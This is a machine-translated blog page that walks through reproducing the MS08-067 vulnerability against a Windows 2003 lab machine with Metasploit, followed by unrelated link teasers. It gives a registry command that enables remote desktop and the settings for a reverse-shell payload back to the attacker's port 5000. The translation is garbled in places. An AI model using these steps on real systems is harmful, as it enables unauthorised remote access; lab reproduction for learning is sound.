Drone aircraft :Win2k3

attack :BT5

One :nmap see WinK3 Open port 3389


  to open up 3389 Method : My computer -> attribute -> long-range


   Command line mode on 3389 port ( Any port ):

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f > C:\WINDOWS\system32\3389.bat && call 3389.bat

Two 、 Attack phase

  1、 lookup ms08_067 Vulnerability module


  2、 call 08_067_netapi Penetration module

  3、 Check the attack load corresponding to this penetration module


  4、 View the setup parameters and set the required parameters


set payloads generic/shell_reverse_tcp  # Set up the required modules 

set options # View the parameters of the settings required by the module 


set RHOST # Set target host 
set LRHOST # Set up this machine
set LPORT 5000 # Set the port between the attacker and the target
show targets
set target 7 # adopt show targets You can see what vulnerability supports windows edition , And set the version serial number corresponding to the target host

5、 Start the attack


You can see that it's already win2k3 Of C The disk is in the directory


In the middle of penetration testing -- Loophole recurrence --MS08_067 More articles about

  1. Shodan Some usage in penetration testing and vulnerability mining

    In penetration testing , The first stage is information gathering , How this stage is completed determines whether your future is going well , Is it easier . And there are too many articles about information collection on the Internet . Today, let's use some examples to explain how to use Shodan This weapon . Want to take advantage of ...

  2. OWASP_ZAP Integrate penetration testing and vulnerability tools

    Please refer to https://www.jianshu.com/p/78d7d4ad8054

  3. ref:Web Service Penetration testing goes from entry to mastery

    ref:https://www.anquanke.com/post/id/85910 Web Service Penetration testing goes from entry to mastery Release time :2017-04-18 14:26:54 The translation states that : This article is a translation of ...

  4. i Spring and summer training camp for penetration testing engineers

    Everyone's summer They all have their own way of unlocking Or an unforgettable trip Or lying at home with the air conditioner blowing and eating watermelon Or go to summer training camp with your friends i Penetration testing engineer in spring and summer All registration channels are open In order to ensure the quality of the course , Adopt small class teaching , Each class is limited to 3 ...

  5. ms08-067 Loophole -- I'm new to penetration testing -- I think many beginners will encounter all kinds of problems mentioned in my article

    I read a book recently --<< Penetration testing practice guide >>, After testing some of the examples in the book , Start taking it ms08-067 This classic serious loophole drill , There are many problems in practice , Fortunately, we have solved them one by one , Benefit a lot . On Google ...

  6. Teach you to pass Node.js Vulnerability complete penetration test

    This article describes in detail through node.js To complete the process of penetration testing , It introduces node.js The existing vulnerabilities can be used in different ways under a variety of tools . Because I think it will be helpful to the forum web Security novices help , So put it in the Forum . ...

  7. 【10.21 summary 】 An example of a penetration test exercise —— Unknown vulnerability found (Race condition)

    Write-up Address :Exploiting an unknown vulnerability author :Abhishek Bundela This article is not the same as the one I saw before , The author simply describes it in the way of an exercise ...

  8. 【 Penetration test 】 How to use it burpsuite There is no echo vulnerability in the test

    The previous article talked about windows and linux Different methods of no file penetration testing on , So this article explains how to use the loophole without echoing , utilize burpsuite The way to test with plug-ins . First of all, let's talk a little bit about which ones have no response ...

  9. PJzhang: Vulnerability penetration testing framework “ Angel's sword (AngelSword)”

    Cat Ning !!! Reference link : www.phpinfo.cc/?post=42 https://www.freebuf.com/sectool/149883.html Colleagues introduced a penetration testing framework AngelSw ...

  10. Web Penetration testing vulnerability manual and repair suggestions

    Web Penetration testing vulnerability manual and repair suggestions 0x0 Configuration Management 0x01 HTTP Method test Introduction to loopholes : The target server has an insecure transport method enabled , Such as PUT.DELETE etc. , These methods indicate that... May be used on the server WebDAV, ...

Random recommendation

  1. align Center the picture and text

    <img src=...  align=absmiddle />

  2. Windows Service timing execution mode

    use System.Timers.Timer  At regular intervals Mode one : At regular intervals , Key code : protected override void OnStart(string[] args) ...

  3. java, poi, excel

    Work needs to be done with java operation Excel, Now I've searched the Internet , Decide to choose POI Package to operate .pom The contents are as follows : <dependency> <groupId>org.apache.poi< ...

  4. SpringMVC suffix

    <!-- ad locum , Use *.html It's a suffix URL Can be baobaotao Servlet to intercept , And then turn to SpringMVC Frame to handle . stay Struts In the frame , Generally will URL The suffix is configured as *.do: stay w ...

  5. Buy Yongnan middleware and send it to the client C/S and B/S Development framework

    Buy wing nam DATASNAP I want to send CS Plug in development framework and BS Development framework ,CS.BS The development framework shares the same middleware . The price is favorable ! Middleware can be used for DELPHI6~DELPHI XE8 Development of client calls ! CS Development framework screenshot : B ...

  6. IT Version Kong Yiji ( turn )

    [ Don't be a pedant ] Recalling Mr. Kong IT edition My comments on this article : Many people will have such questions when they read this article “ This is obviously slandering people who study technology ? Is it preaching that technology is useless ?”. When I first read this article, I thought the same way , But gradually I understand this article ...

  7. ASP.NET take word Document conversion to pdf Code for

    One . Add reference using Microsoft.Office.Interop.Word; Two . Transformation method 1. Method C# Code /// <summary> /// hold Word File conversion to pdf writing ...

  8. asp.net Configure secondary domain name sharing session, And implement sso Single sign on

    The company recently launched a new website . The original website address is www.xxxx.com. The new website will be deployed to info.xxxx.com. These two websites need to realize single sign on . And the reason of the new and old website itself is the organization , Judging the login status , That's right s ...

  9. Excel Conditional summation ——SUMIF function

    My wife asked for help , ask Excel How to cross the middle Sheet Conditional summation , It's about sheet2 The data filtered out in is automatically summed up in sheet3 in . Such as a sheet2 The data in the table are as follows : Now want to be in sheet3 To sum up , Through the analysis, it can be concluded that ...

  10. channel and Stream Comparison of

    The main purpose of this article is to summarize NIO Of channel Tradition io Medium stream What's the difference between . I found a lot of articles on the Internet , I feel like I just talked about the concept . Then I looked at the source code , Combining concepts , Sort it out . Some places may not be very accurate , I hope I can give you some ...